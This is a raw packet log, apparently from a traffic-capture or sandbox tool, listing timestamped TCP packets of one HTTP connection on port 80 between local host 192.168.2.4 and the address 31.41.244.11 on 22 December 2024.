Dec 22, 2024 02:16:22.334652901 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.334700108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.336360931 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.336424112 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.336441994 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.336489916 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.338195086 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.338248968 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.338399887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.338452101 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.339824915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.339929104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.339937925 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.339977026 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.341614008 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.341670990 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.341754913 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.341828108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.343381882 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.343437910 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.343497992 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.343548059 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.345153093 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.345220089 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.345247030 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.345307112 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.346949100 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.347023010 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.347091913 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.347153902 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.348685026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.348762989 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.348800898 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.348860025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.350449085 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.350564957 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.350735903 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.350790977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.352225065 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.352292061 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.352443933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.352495909 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.354007959 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.354072094 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.354126930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.354182005 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.355776072 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.355834961 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.355902910 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.355954885 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.378607988 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.378664970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.378688097 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.378720045 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.450297117 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.450321913 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.450362921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.450382948 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.451159954 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.451186895 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.451214075 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.451225996 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.452764034 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.452811003 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.452905893 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.452949047 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.454535961 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.454582930 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.454665899 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.454710007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.456296921 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.456345081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.456387997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.456434965 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.458069086 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.458112955 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.458144903 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.458189011 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.459837914 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.459882021 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.459933043 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.459978104 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.461610079 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.461663008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.461817026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.461864948 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.463299036 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.463352919 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.463429928 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.463475943 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.464982033 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.465046883 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.465095997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.465152025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.466629028 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.466692924 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.466774940 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.466825008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.468233109 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.468342066 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.468349934 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.468389988 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.469819069 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.469881058 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.469923019 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.469980001 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.471410036 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.471473932 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.471585035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.471641064 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.472944975 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.473009109 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.473129988 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.473179102 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.474483013 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.474545956 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.474637032 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.474687099 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.476001978 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.476068974 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.476119041 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.476165056 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.477531910 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.477593899 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.477675915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.477731943 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.479085922 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.479190111 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.479217052 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.479264975 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.480593920 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.480654955 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.480685949 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.480731964 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.482119083 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.482177973 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.482228994 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.482279062 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.483705997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.483758926 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.483761072 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.483812094 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.485198021 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.485249043 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.485294104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.485342979 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.486740112 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.486788988 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.486864090 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.486912012 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.488235950 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.488279104 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.488394976 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.488437891 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.489722013 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.489768982 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.489849091 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.489892006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.491228104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.491275072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.491307974 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.491357088 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.492733955 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.492783070 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.492866039 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.492913008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.494265079 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.494309902 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.494461060 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.494508982 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.495774031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.495821953 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.495913029 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.495955944 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.497260094 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.497306108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.497442961 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.497493982 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.498752117 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.498800993 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.498869896 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.498919010 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.500298023 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.500396013 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.500397921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.500441074 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.501764059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.501815081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.501987934 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.502037048 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.502779007 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.502830029 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.502897978 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.502940893 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.503794909 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.503842115 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.503951073 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.504004002 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.504815102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.504862070 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.504920959 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.504966974 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.505806923 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.505870104 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.505884886 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.505930901 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.506803989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.506853104 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.506937981 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.506979942 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.507844925 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.507890940 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.507939100 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.507983923 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.508837938 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.508891106 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.509010077 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.509063005 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.509846926 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.509900093 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.509943962 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.509985924 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.510871887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.510936975 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.510938883 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.510977030 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.511874914 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.511915922 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.511991024 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.512032986 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.512921095 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.512984991 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.512996912 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.513065100 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.513900042 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.513952971 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.514050961 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.514096975 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.514930964 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.514993906 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.515032053 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.515079021 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.515937090 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.515981913 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.516053915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.516093016 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.516958952 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.517014027 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.517024040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.517091990 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.517973900 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.518038988 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.518081903 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.518129110 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.518982887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.519037008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.519079924 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.519130945 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.519993067 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.520039082 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.520086050 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.520127058 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.521013021 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.521076918 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.521112919 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.521153927 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.642752886 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.642797947 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.642813921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.642857075 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.642860889 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.642901897 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.642911911 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.642949104 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.643709898 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.643765926 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.643800020 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.643846989 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.644603014 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.644651890 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.644686937 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.644735098 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.645317078 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.645359993 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.645433903 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.645478010 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.646203995 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.646259069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.646332026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.646378040 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.647150040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.647197008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.647267103 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.647320032 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.648103952 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.648149967 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.648216009 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.648262978 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.649102926 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.649156094 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.649158001 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.649203062 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.649971962 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.650017977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.650084972 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.650130987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.650933027 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.650979996 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.651062965 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.651108980 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.651882887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.651933908 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.651998043 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.652041912 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.652836084 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.652899981 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.652954102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.653001070 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.653772116 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.653817892 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.653958082 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.654005051 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.654748917 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.654794931 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.654809952 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.654854059 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.655674934 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.655724049 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.655755997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.655803919 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.656601906 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.656656981 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.656697035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.656743050 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.657546043 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.657593012 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.657608986 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.657653093 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.658473969 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.658519983 CET	49787	80	192.168.2.4	31.41.244.11
